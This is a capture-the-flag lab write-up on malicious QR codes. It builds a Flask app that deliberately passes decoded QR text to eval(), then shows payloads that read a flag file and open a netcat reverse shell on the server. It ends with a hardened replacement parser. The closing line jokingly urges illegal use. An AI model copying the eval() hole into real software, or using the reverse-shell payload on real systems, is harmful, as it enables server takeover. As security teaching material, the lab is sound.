# Hackweekend Session 0 - QR Code Vulnerabilities (from a malicious QR code to a reverse shell)

###### tags: `vulnerable` `tutorials` `ctf` `research`

## Resources

- [QR Codes Exploitation: How to Mitigate the Risk?](https://blog.beaconstac.com/2021/06/qr-codes-exploitation/#:~:text=One%20of%20the%20most%20common,scan%20the%20Code%20and%20pay.)
- [Create Malicious QR Codes to Hack Phones & Other Scanners](https://null-byte.wonderhowto.com/how-to/create-malicious-qr-codes-hack-phones-other-scanners-0197416/)
- [Think before you scan: How fraudsters can exploit QR codes to steal money](https://www.welivesecurity.com/2022/02/04/think-before-scan-how-fraudsters-exploit-qr-codes/)
- [Qrljacking](https://owasp.org/www-community/attacks/Qrljacking)

*So which technology grew up during the COVID-19 pandemic and became a popular everyday tool in that terrible time?* **QR codes :thinking_face:**

I had a couple of questions about QR codes:

- What actually happens when a QR code is scanned?
- Is it just a harmless process, or can it be turned into something dangerous: an infection, or a way to gain access?
- Can we control a whole machine, such as a computer, through a scanned QR code?

--> Those questions are the reason I wanted to explore this.

## Some real-world information

- A recent consumer research report revealed that **34% of respondents** have zero privacy, security, financial, or other concerns while using QR codes.
- Since any kind of malware or phishing link in a QR code poses significant security risks for both enterprises and consumers, stringent security measures should be considered to mitigate the risk.

![](https://i.imgur.com/dy8xvvl.png)

## The target :point_down:

**Scenario**: because people do not understand what a QR code can carry, QR codes make a juicy target for an attacker. So the plan is to use a basic tool such as `QRGen` to produce a QR code, get the victim's scanner (a server, a mobile phone, a hardware reader, ...) to read it, and see what a malicious payload can do from there. Taken far enough, that can mean full control of the scanning system. :fire:

*But first, let's understand how a QR code works and what kind of target we have.*

## What I can do with a malicious QR code

### What is a QR code?

- QR codes are machine-readable data formats that are useful for anything that needs to be scanned automatically.
- Before QR codes, there were several other formats called linear barcodes, which also stored data in a way that was easy for machines to read.

![](https://i.imgur.com/bryWboM.png)

- Many different types of linear barcodes exist, but they aren't able to store a lot of information. Applications like shipping and automobile manufacturing required a standard that would hold more data. **The answer to the limitation of linear barcodes was 2D barcodes**, which offer more storage and are more resistant to physical damage affecting the information they contain.

![](https://i.imgur.com/1R69Fvt.png)

- The image above shows an `Aztec code`. An Aztec code is a 2D, or matrix, machine-readable code that is similar in many ways to a QR code and can hold more information than a linear barcode.
- Other types of 2D barcodes can contain an extremely dense amount of data. The `PDF417` format found on the back of most driver's licenses in the United States, for example, can encode up to 1800 ASCII characters.

![](https://i.imgur.com/jpL8yHV.png)

### What can I do with that?

- Today a QR code can encode a large number of characters, and the scanning application decides what to do with them. That is what makes some fascinating applications possible, such as sharing a Wi-Fi connection with a string like `WIFI:S:<SSID>;T:<WPA|WEP|>;P:<password>;H:<true|false|>;`
- From that example you can imagine how an attacker uses a generated QR code: whatever the scanner does with the decoded string, that string is attacker-controlled input, so the usual web application vulnerability classes apply (poisoning from the web app side), such as:
  * SQL injection
  * XSS
  * Command injection
  * Format string
  * XXE
  * String fuzzing
  * SSI injection
  * LFI / directory traversal

## Cybercrime that can be caused by a QR code

- Redirect you to a malicious website to steal sensitive information
- Download a malicious file onto your device
- Trigger actions on your device
- Divert a payment or make requests for money
- Steal a user's identity or access to an application (**the target of this lab**)

## Tips to prevent

* Before scanning a QR code, check that it has not been tampered with; for example, verify that it doesn't cover up another QR code.
* Refrain from scanning randomly found QR codes or codes in unsolicited messages.
* Exercise the same caution with the codes as when handling links or attachments in emails or messaging apps.
* Be very careful when it comes to using a QR code to pay a bill or conduct another kind of financial transaction. Consider using another payment option.
* Disable the option to perform automatic actions when scanning a QR code, such as visiting a website, downloading a file, or connecting to a Wi-Fi network.
* After scanning, look at the URL to check that it's legitimate. Even so, it may often be better to avoid inputting your login or personal information on a site you've landed on via a QR code. If something feels off, open a browser and type the URL yourself.
* Do not share QR codes containing sensitive information, such as those used to access apps or those included in documents and health certificates.
* When generating a QR code, use a reputable service. Such a service can also verify that the QR code is genuine and performs the desired action.
* Keep your apps up to date and use security software.

# Lab Time

> After taking the time to build a lab, it was done. So let me come back and talk about the progress of building it, and what we can do with a malicious QR code to gain access to the victim.

*As you know, I am a CTF player, so I tried to build the vulnerability in the style of a CTF challenge. That makes it easy for anyone who wants to approach it.*

## Language and packages to start

- Python `(main language)`
- Flask `(web framework)`
- qrtool `(library for working with QR codes)`
- PIL `(library for image processing)`
- pyzbar `(library for decoding QR codes)`

--> That was enough for me to build this challenge.

## The structure

![](https://i.imgur.com/zcfALM4.png)

- A basic structure: `app.py` holds the functions of the website
- `templates` stores the HTML ==> lets Flask render and redirect
- `static` holds images and scripts if you want them, but it is not needed now

## Detailed source code

```python
#! app.py
from flask import Flask, render_template, request, redirect, flash
from pyzbar.pyzbar import decode
from PIL import Image
import random


def decodeQR_code(image):
    """Decode the first QR symbol found in the uploaded image; '' if none is found."""
    decodeQR = decode(Image.open(image))
    if not decodeQR:
        return ''
    return decodeQR[0].data.decode('ascii')


def isvalidimage(image):
    """The challenge only accepts square images (a QR code is square)."""
    im = Image.open(image)
    w, h = im.size
    return w == h


app = Flask(__name__)
app.secret_key = "secret key"


@app.route('/')
def index():
    return render_template('index.html')


@app.route('/auth')
def authentication_doc():
    url_ran = ['https://www.freecodecamp.org/news/how-to-authenticate-users-in-flask/',
               'https://realpython.com/using-flask-login-for-user-management-with-flask/',
               'https://testdriven.io/blog/flask-spa-auth/',
               'https://fiverr-res.cloudinary.com/images/t_main1,q_auto,f_auto,q_auto,f_auto/gigs/129737214/original/49d95bd5e47653963b30ed02ca1aec87174a83e5/create-professional-qr-codes.png']
    # relative weights: the hint image is picked with probability 1e-12 / (40 + 50 + 20 + 1e-12)
    pick = random.choices(url_ran, weights=(40, 50, 20, 0.000000000001), k=1)[0]
    return redirect(pick)


@app.route('/qr', methods=['GET'])
def QRoauth():
    return render_template('qrcode.html')


@app.route('/qr', methods=['POST'])
def QRsubmit():
    if 'file' not in request.files:
        flash('No file part')
        return render_template('qrcode_submit.html')
    file = request.files['file']
    if file.filename == '':
        flash('No image selected for uploading')
        return render_template('qrcode_submit.html')
    if file:
        if isvalidimage(file):
            decode_string = decodeQR_code(file)
            print(decode_string)
            if decode_string == "":
                flash('submit complete, how to you know wat your blob ? think what you got and try again')
                return render_template('qrcode_submit.html')
            else:
                # the intended vulnerability of the challenge: decoded QR text goes straight into eval()
                flash('submit complete, what a good think? qr here you are ' + eval(decode_string))
                return render_template('qrcode_submit.html')
        else:
            flash('think far about the image you submit, it should be had same between width and height')
            return render_template('qrcode_submit.html')


@app.route('/gow')
def gow():
    return render_template('gow.html')


if __name__ == '__main__':
    app.run(debug=True)
```

```html
<!-- templates/gow.html -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>godofwar</title>
</head>
<body>
    <img src="https://cdn-img.thethao247.vn/origin_768x0/storage/files/haibui/2022/11/09/sieu-pham-god-of-war-ragnarok-chinh-thuc-ra-mat-215580.png" style="display: block;margin-left: auto;margin-right: auto;">
    <p hidden>This is why you need to read a metadata concept of ragnarok: uggcf://ra.jvxvcrqvn.bet/jvxv/DE_pbqr</p>
</body>
</html>
```

```html
<!-- templates/index.html -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HackerSide</title>
</head>
<body>
    <div style="display: flex;justify-content: center;align-items: center;text-align: center;min-height: 50vh;">
        <h1 style="display:inline;text-align: center;"><code>This is the manual book of website? What you think about that ????</code></h1>
    </div>
    <div style="display: flex; align-items: center; font-size: large; place-content: space-evenly;">
        <ul>
            <li><code><a href="/auth">Authentication method</a></code></li>
            <li><code><a href="/qr">Submit</a></code></li>
            <li><code><a href="/gow">God of war</a></code></li>
        </ul>
    </div>
</body>
</html>
```

```html
<!-- templates/qrcode_submit.html -->
<!DOCTYPE html>
<title>Hey QRcode submit</title>
<p>
{% with messages = get_flashed_messages() %}
  {% if messages %}
    <ul>
    {% for message in messages %}
      <li><code>{{ message }}</code></li>
    {% endfor %}
    </ul>
  {% endif %}
{% endwith %}
</p>
```

```html
<!-- templates/qrcode.html -->
<!DOCTYPE html>
<title>Hey, QR submit check the out</title>
<h2 style="text-align: center;display:flex;justify-content: center;">Select a file to upload</h2><br>
<div style="display: flex;justify-content: center;align-items: center;text-align: center">
    <form method="post" action="/qr" enctype="multipart/form-data">
        <dl>
            <p>
                <input type="file" name="file" autocomplete="off" required>
            </p>
        </dl>
        <p>
            <input type="submit" value="Submit">
        </p>
    </form>
</div>
```

- This is the code for my processing; the target I want to point out is the vulnerability that a malicious QR code reaches.
- Focus on `app.py`, because it contains my idea for creating the `trick`.

![](https://i.imgur.com/vmMxcPE.png)

- First we have two functions, one to check the image and one to decode the QR code, and they work exactly as I want.
- Never mind that it looks like a lot; it gives you the idea of the submission flow.
- I also need `app.secret_key = "secret key"`: Flask signs the session that carries flashed messages back to the view, so a secret key is required. Helpful :smiling_face_with_smiling_eyes_and_hand_covering_mouth:

![](https://i.imgur.com/dtYayBL.png)

- With the `/auth` route I let people try their luck at getting the idea of the challenge, but the hint is picked with probability 0.000000000001/(40+50+20+0.000000000001), so it is hard to get it this way :smile:

![](https://i.imgur.com/oWAHohk.png)

- The `/gow` route is there to hint at the method for exploiting this challenge, so we can reach `gow.html`.

![](https://i.imgur.com/FZMYAtv.png)

Very basic, but if you are careful you can spot the ROT13 string in the hidden element of the page: `<p hidden>This is why you need to read a metadata concept of ragnarok: uggcf://ra.jvxvcrqvn.bet/jvxv/DE_pbqr</p>`. Run it through ROT13 and you get what I wanted to point at: `https://en.wikipedia.org/wiki/QR_code`

- But that is only a hint for understanding the method. To reach the next step you need to know that the submit form is a form for uploading a QR code image, so how do we exploit it?

## Exploit

```python
@app.route('/qr', methods=['GET'])
def QRoauth():
    return render_template('qrcode.html')


@app.route('/qr', methods=['POST'])
def QRsubmit():
    if 'file' not in request.files:
        flash('No file part')
        return render_template('qrcode_submit.html')
    file = request.files['file']
    if file.filename == '':
        flash('No image selected for uploading')
        return render_template('qrcode_submit.html')
    if file:
        if isvalidimage(file):
            decode_string = decodeQR_code(file)
            print(decode_string)
            if decode_string == "":
                flash('submit complete, how to you know wat your blob ? think what you got and try again')
                return render_template('qrcode_submit.html')
            else:
                # the decoded QR text is evaluated as Python
                flash('submit complete, what a good think? qr here you are ' + eval(decode_string))
                return render_template('qrcode_submit.html')
        else:
            flash('think far about the image you submit, it should be had same between width and height')
            return render_template('qrcode_submit.html')
```

- This is what happens when you click submit:

![](https://i.imgur.com/oSfzmML.png)

- If you look closely enough to bypass this, you know it only accepts QR code images:

![](https://i.imgur.com/ZTHAGyJ.png)

- So try uploading a QR code image. How to generate one? You can easily find [QRGen](https://github.com/h0nus/QRGen), which contains many wordlists you can generate codes from and use to try to gain access to this web app. But, as I said, the flag is just a flag and it is simple to get.
- If you submit the right payload, you get what you want. Why? Because the code passes the decoded string to `eval()`, the most powerful function in Python (and in any language that has one). There are many payloads that would work, but this is a very easy question, so just try `open('flag').read()` and generate a QR code with it, like:

![](https://i.imgur.com/yt8o5P2.png)

- Another way is to use the same weakness to get a shell on the web server: generate a QR code such as `__import__('os').system('nc 0.0.0.0 9999 -e /bin/sh')` and you will get what you want. This PoC is the upgrade of my progress and what I could reach when exploiting the basic challenge.

![](https://i.imgur.com/UOd4BAe.png)

- The result when we submit: the flag and a shell on the web server

![](https://i.imgur.com/YIfExIu.png)
![](https://i.imgur.com/JS1PMoY.png)
![](https://i.imgur.com/qUCjvcQ.png)
![](https://i.imgur.com/6KUpMoV.png)
![](https://i.imgur.com/0lji572.png)
![](https://i.imgur.com/IiWulsb.png)

## Happy hacking and be illegal for your purpose :smile:
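As a closing, defender-side counterpoint to the `/qr` handler above: the lab hands the decoded QR text to `eval()`, and the fix is to treat that text as data. The added example below (my code, not the lab's) parses only the two formats discussed on this page, the `WIFI:` string from the "What can I do with that?" section and an https URL on an allow-list, and rejects everything else, so the payloads shown in the Exploit section are never executed. The allow-listed host, the length cap and the function names are assumptions for the example.

```python
"""Hardened handling of a decoded QR payload (added example, not the lab's code).
The lab's /qr handler calls eval() on whatever pyzbar decodes, so any QR image is
code execution on the server. Here the decoded string is treated as untrusted data:
only an https URL on an allow-listed host or a WIFI: string is accepted, nothing is run."""
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"en.wikipedia.org"}  # assumption: the only redirect target this app needs
MAX_PAYLOAD_LEN = 1800                # assumption: cap on decoded text length
# one 'K:value;' field; a backslash escapes ';', ':' and '\' inside the value
_WIFI_FIELD = re.compile(r"([STPH]):((?:\\.|[^;\\])*);")

def parse_wifi(payload):
    """Parse 'WIFI:S:<SSID>;T:<WPA|WEP|>;P:<password>;H:<true|false|>;' or return None."""
    if not payload.startswith("WIFI:") or not payload.endswith(";"):
        return None
    fields, pos = {}, len("WIFI:")
    while pos < len(payload):
        m = _WIFI_FIELD.match(payload, pos)
        if m is None:
            if payload[pos:] == ";":  # optional ';;' terminator emitted by many generators
                break
            return None
        key, raw = m.group(1), m.group(2)
        if key in fields:             # duplicated field: treat as malformed
            return None
        fields[key] = re.sub(r"\\(.)", r"\1", raw)
        pos = m.end()
    if "S" not in fields or fields.get("T", "") not in ("", "WPA", "WEP", "nopass"):
        return None
    if fields.get("H", "") not in ("", "true", "false"):
        return None
    return fields

def classify_payload(decoded):
    """Return ('url', url), ('wifi', fields) or ('rejected', reason); never evaluates input."""
    if not isinstance(decoded, str) or not decoded or len(decoded) > MAX_PAYLOAD_LEN:
        return ("rejected", "empty or oversized payload")
    if any(ord(c) < 0x20 for c in decoded):
        return ("rejected", "control characters in payload")
    if decoded.startswith("WIFI:"):
        fields = parse_wifi(decoded)
        return ("wifi", fields) if fields else ("rejected", "malformed WIFI string")
    try:
        parsed = urlparse(decoded)
    except ValueError:
        return ("rejected", "unparseable URL")
    if parsed.scheme == "https" and parsed.hostname in ALLOWED_HOSTS and parsed.username is None:
        return ("url", parsed.geturl())
    return ("rejected", "not an allow-listed https URL")  # eval()-style payloads land here
```

In the Flask handler, `classify_payload(decode_string)` replaces the `eval()` call: a `url` result is redirected to, a `wifi` result is shown back as parsed fields, and a `rejected` result is flashed with its reason.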